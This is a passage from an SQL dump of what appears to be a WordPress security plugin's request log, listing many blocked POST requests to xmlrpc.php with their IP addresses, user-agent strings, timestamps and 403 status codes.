Safari\\/537.36\"}','BPtRma2NZIQnXT4pSCueUqdc',0,1681370733.5597,573,'','POST',403,0,515,0,1,'',0),('185.104.44.58',3110612026,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','yaSzOhW1GgxuZ2oDcVeBiC7A',0,1681370737.7957,558,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','eo2K9xZqTV0UnJO3EsuCwj5G',0,1681370750.3472,1135,'','POST',403,0,515,0,1,'',0),('157.90.169.39',2639964455,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','TPFMoDRyO2Ec3tZqJkB5eXv7',0,1681370750.7611,1041,'','POST',403,0,515,0,1,'',0),('5.9.178.235',84521707,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','IDP7hu3aSl8eqZrftvz6bT9m',0,1681370759.3841,1882,'','POST',403,0,515,0,1,'',0),('103.121.90.183',1736006327,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','XwedKL2oEqU0x3IyGtmZ4SiD',0,1681370760.9563,2402,'','POST',403,0,515,0,1,'',0),('192.64.117.87',3225449815,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','OdseKVC0EitWFv1zoyH7Pp9U',0,1681372144.9781,1772,'','POST',403,0,515,0,1,'',0),('149.129.53.70',2508272966,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','4fLIMoHORNx1hmva0Pn3TdQG',0,1681372143.0612,4383,'','POST',403,0,515,0,1,'',0),('78.111.2.100',1315897956,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','V9WhTe7aMyD63BqEGiKno4OP',0,1681372150.0407,1599,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','6oiqzSFfAVNvYcOBlKQGp5Te',0,1681372155.1715,548,'','POST',403,0,515,0,1,'',0),('185.221.181.80',3118314832,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','ga9N2jGl8QUTYVfuw53xFD6c',0,1681372168.8974,619,'','POST',403,0,515,0,1,'',0),('157.245.147.60',2650116924,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','pyQeqnTO5avDMElK4WJGFYwg',0,1681372170.9200,549,'','POST',403,0,515,0,1,'',0),('185.221.181.80',3118314832,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','E7TDC95kBjhLKoaupJt8dFS6',0,1681372172.4086,629,'','POST',403,0,515,0,1,'',0),('91.219.122.50',1541110322,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','WQZjieHV3RgsJ1wa9OzEY76I',0,1681372177.9064,569,'','POST',403,0,515,0,1,'',0),('82.16.21.137',1376785801,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','QihZIz6fUmglsaLYjHNy5EBK',0,1681372186.3635,599,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','QGm48u1YytdIwhorZsLC5JSE',0,1681372585.8986,2210,'','POST',404,0,515,0,1,'',0),('159.223.60.241',2682207473,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','FLbCBZRW5Isvp93yw7ecSm6K',0,1681372587.1841,2669,'','POST',403,0,515,0,1,'',0),('45.195.25.73',767760713,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','feR2H6MvVxS4lAyJ3Drm18E5',0,1681372591.2393,598,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','EIY0x2uKMs4o6aUilzq8XOQe',0,1681372596.7663,573,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','WMVQ2tvRxAKuGPHCS4rZjOJ7',0,1681372602.0133,605,'','POST',403,0,515,0,1,'',0),('31.47.253.132',523238788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','G3EhnMoeIyZHXRVBm6ds8NiK',0,1681372603.7908,890,'','POST',403,0,515,0,1,'',0),('163.47.21.95',2737771871,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','s3Y5oHzZV7hmfJ9Mk0v62puN',0,1681372604.3649,786,'','POST',403,0,515,0,1,'',0),('8.210.238.120',148041336,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','lWLtNGfE4KYMqSJbOmyc5aZR',0,1681372606.2180,590,'','POST',403,0,515,0,1,'',0),('103.9.227.178',1728701362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','pn20IgYXoCsTv8NqVBKuA6mt',0,1681372613.5854,596,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','lK71wW0doEyJQZTjqkth3z69',0,1681372616.2516,597,'','POST',403,0,515,0,1,'',0),('198.50.254.114',3325230706,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','W0uBMG5JcoLQAbSj2yw6tIPH',0,1681372622.3556,618,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','vfiWBRrZPla3VHuc6Lgo9yh5',0,1681372631.1587,572,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','JwVfAD1e7FUMu3NErsXP2WBb',0,1681375530.0135,569,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','9k5q0ae6c7nFpsAhtrlYSvo2',0,1681376649.6510,4403,'','POST',403,0,515,0,1,'',0),('95.0.0.250',1593835770,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','YIlHJX1TcWAQd6s4UmwpbK58',0,1681376650.9100,3149,'','POST',403,0,515,0,1,'',0),('201.148.104.84',3381946452,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','Rs1TJEFu2GxNgdQeO54rtbah',0,1681378200.4242,662,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','1v63OtiVDAWKkulM59JUEXxp',0,1681378208.1934,724,'','POST',403,0,515,0,1,'',0),('41.222.211.123',702468987,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','1pM0JYNjuknadRoVsUB74lqc',0,1681382035.8191,586,'','POST',403,0,515,0,1,'',0),('185.232.250.86',3119053398,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','ZAiCWwzM6Qrg2dTVmltGeUXF',0,1681382049.3519,586,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Pw1VO7Fyn62vEZaQNTGAksS8',0,1681382050.8415,561,'','POST',403,0,515,0,1,'',0),('162.240.222.21',2733694485,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','ET2ANjlKO3MrpoGnHhu0JwgF',0,1681382053.9046,597,'','POST',403,0,515,0,1,'',0),('65.20.75.229',1091849189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','MDNVFimSzeOnk9BQa8G45jIC',0,1681382064.5608,1224,'','POST',403,0,515,0,1,'',0),('198.50.254.114',3325230706,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','E7Daciby9ks3CZqH5mrdV8XW',0,1681382066.5430,541,'','POST',403,0,515,0,1,'',0),('190.104.235.180',3194547124,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','RXsbYFIQSGZ1qNT5KCu8nkal',0,1681382071.2467,611,'','POST',403,0,515,0,1,'',0),('54.36.172.75',908373067,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','C7BzwcliLNqf20U9bDQMF6eS',0,1681382358.6829,1447,'','POST',403,0,515,0,1,'',0),('185.151.241.152',3113742744,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','SOZo5JLmuhfzX3RWt91bxar2',0,1681382365.6324,554,'','POST',403,0,515,0,1,'',0),('103.174.86.163',1739478691,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','getp8yIhWc9MXSrYkUJKZ7D3',0,1681382369.4396,566,'','POST',403,0,515,0,1,'',0),('85.25.213.84',1427756372,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','E80aCiXOfeJpxhT74B9DQUwt',0,1681382383.3964,572,'','POST',403,0,515,0,1,'',0),('162.255.118.205',2734651085,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','6w4kXruMc7p8iGBSthxoHTA0',0,1681382590.6015,1301,'','POST',403,0,515,0,1,'',0),('95.111.255.131',1601175427,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','N80OdSZgiejuG9nvtUWKXps1',0,1681382592.3761,563,'','POST',403,0,515,0,1,'',0),('91.204.46.124',1540107900,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','7oQM3jxmr0dbSVUeyAvkJWK6',0,1681382610.3213,556,'','POST',403,0,515,0,1,'',0),('212.107.12.77',3563785293,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','HXdeCnygrvjRY7QL8BW49bTi',0,1681382620.4983,595,'','POST',403,0,515,0,1,'',0),('198.23.62.79',3323412047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','IuUqpkKOTyGw0sWJl5SY1Rgx',0,1681382621.4457,592,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','Ubh4sVnD5iYRampSzvM6wjXB',0,1681382637.3129,593,'','POST',403,0,515,0,1,'',0),('5.161.122.207',94468815,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','iVw4roE9tZnGOY8Pq7pmd1A2',0,1681386285.3568,593,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','2OK9mtNQzJjyx8FbiLoD1vqc',0,1681386297.4609,1385,'','POST',403,0,515,0,1,'',0),('46.182.84.66',783701058,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','jhyM5pgOFLwPVRm6Ukr0XIKH',0,1681386297.1338,2216,'','POST',403,0,515,0,1,'',0),('209.126.6.155',3514697371,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','6sg3BhCnLEWxRyvwmPNpr40t',0,1681386307.4470,655,'','POST',403,0,515,0,1,'',0),('139.180.134.149',2343863957,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','l67V9AHsKU2MCJIDZkOyjtiB',0,1681387179.3101,1341,'','POST',403,0,515,0,1,'',0),('142.93.223.16',2388516624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','d0jVcsGmqbWJA8h9lTz56XDx',0,1681387177.7670,2889,'','POST',403,0,515,0,1,'',0),('173.214.170.82',2916526674,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','OAFId4ckt8BQx6TmegMPJVjf',0,1681387192.4230,1729,'','POST',403,0,515,0,1,'',0),('103.92.235.82',1734142802,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','5BbK8oeA9PLsSHmuWCcY3VTG',0,1681387193.2674,1458,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','0ER7fMQxXFLmoes9ADGJN5ga',0,1681390971.3438,587,'','POST',403,0,515,0,1,'',0),('185.119.88.55',3111606327,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','hgVkNFDB1nRvQ0mEAzrSZGYd',0,1681391205.4592,1350,'','POST',403,0,515,0,1,'',0),('68.178.151.138',1152554890,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','H6JSuVaRkDUPfp2eiOjrygWY',0,1681391205.5844,1356,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','RWTvFVfL1SBXCNxZH8sDpkKJ',0,1681391213.2993,578,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','kwHbt8TKX1jvRoYOneQSAcy2',0,1681391214.3638,575,'','POST',403,0,515,0,1,'',0),('180.235.151.165',3035338661,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','trQx78zH1LRu9a3Xy6PcsVT5',0,1681391231.3931,608,'','POST',403,0,515,0,1,'',0),('192.241.166.226',3237062370,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','rPBtMumUIScRTxGN1z3Yh2bl',0,1681391232.3214,611,'','POST',403,0,515,0,1,'',0),('67.227.186.45',1138997805,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','1RencgDAbrKTy20uNq4lLWEO',0,1681391240.0832,583,'','POST',403,0,515,0,1,'',0),('91.200.103.0',1539860224,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','mvpaZykIYnz5A3rfeoUVXOCw',0,1681392092.2275,749,'','POST',403,0,515,0,1,'',0),('62.171.174.52',1051438644,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qTV3avxOgLCR51uKXksM8ijn',0,1681392103.0298,570,'','POST',403,0,515,0,1,'',0),('74.208.59.242',1255160818,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','mbpFKH0P6vUERDtMQTsASIyN',0,1681392112.7672,1416,'','POST',403,0,515,0,1,'',0),('185.221.182.129',3118315137,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','uIvpfwdSPxyUKeLGgH5Ac3qF',0,1681392112.8582,1382,'','POST',403,0,515,0,1,'',0),('72.52.238.135',1211428487,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','CAEaHPS4Vxyfmcg9Zj8kdWpD',0,1681392124.3338,612,'','POST',403,0,515,0,1,'',0),('54.36.131.250',908362746,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','fHxb85lmQ7wEk43cigzZIrAt',0,1681392126.3276,543,'','POST',403,0,515,0,1,'',0),('182.50.151.63',3056768831,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','pXDjy3SQh5761sMbZzgaNxKO',0,1681392129.6346,1107,'','POST',403,0,515,0,1,'',0),('68.178.145.141',1152553357,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','izsNjhmFSkac5u7LDBTvA3Ef',0,1681392130.1692,943,'','POST',403,0,515,0,1,'',0),('66.94.107.15',1113484047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','2BjKLkqpPfUFAW1N8aymTcIM',0,1681392563.1997,1395,'','POST',403,0,515,0,1,'',0),('185.2.4.108',3103917164,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','8DLxlVCm52rTPnhXMgcz7Nvp',0,1681392563.4559,1306,'','POST',403,0,515,0,1,'',0),('81.223.232.24',1373628440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','CUJYHS3uZnyjh8afePq0prgM',0,1681392579.2363,673,'','POST',403,0,515,0,1,'',0),('143.42.144.21',2401931285,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','cJ0VOZlvNiGqtUX751WpRQdC',0,1681392580.1726,611,'','POST',403,0,515,0,1,'',0),('5.188.34.69',96215621,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','I4oWRL7TQP2ZlvmpcS0kuKw8',0,1681392583.9644,693,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','bTtvk5zHlgNi2jsXJrQEaMAo',0,1681392588.7735,807,'','POST',403,0,515,0,1,'',0),('54.36.131.250',908362746,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','vq1RkIyzBQEV537GPLSm4H6g',0,1681392590.3969,1592,'','POST',403,0,515,0,1,'',0),('185.198.27.128',3116768128,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','JAqiP5lbvfXLjpCF7orgO9G1',0,1681392610.0645,623,'','POST',403,0,515,0,1,'',0),('193.123.87.139',3246086027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','JblrtRUZHu6WycT8iBLCvhmn',0,1681393340.3029,3873,'','POST',403,0,515,0,1,'',0),('162.214.49.124',2731946364,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 